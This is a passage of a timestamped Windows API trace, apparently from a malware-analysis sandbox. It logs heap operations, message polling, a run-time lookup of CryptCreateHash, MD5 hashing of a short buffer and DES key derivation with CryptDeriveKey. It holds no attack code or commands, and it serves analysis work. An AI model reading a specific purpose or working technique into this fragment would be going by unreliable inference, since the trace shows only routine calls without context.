(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0195.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0195.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0195.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0195.927] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0195.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0195.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0195.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0195.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0195.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0195.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0195.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0195.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0195.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0195.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0195.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0195.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0195.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0195.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0195.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0195.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0195.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0195.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0195.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0195.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x24a9c90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0195.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.930] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0195.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0195.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0195.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0195.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.936] CryptCreateHash (in: hProv=0xad6480, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0195.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0195.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0195.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.940] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.940] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0195.940] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.940] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.940] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.940] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0195.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0195.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0195.940] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.940] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.940] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0195.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0195.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0195.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0195.941] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0195.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0195.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.941] CryptHashData (hHash=0xaa57a0, pbData=0x24b1698, dwDataLen=0x3, dwFlags=0x1) returned 1 [0195.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0195.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0195.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0195.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0195.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0195.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0195.941] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0195.942] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.942] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0195.942] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.942] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0195.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.943] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.943] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.943] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0195.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0195.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.943] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0195.943] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0195.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0195.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.943] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0195.944] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0195.944] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.944] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0195.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0195.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0195.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0195.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0195.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0195.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0195.944] CryptDeriveKey (in: hProv=0xad6480, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58e0) returned 1 [0195.944] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 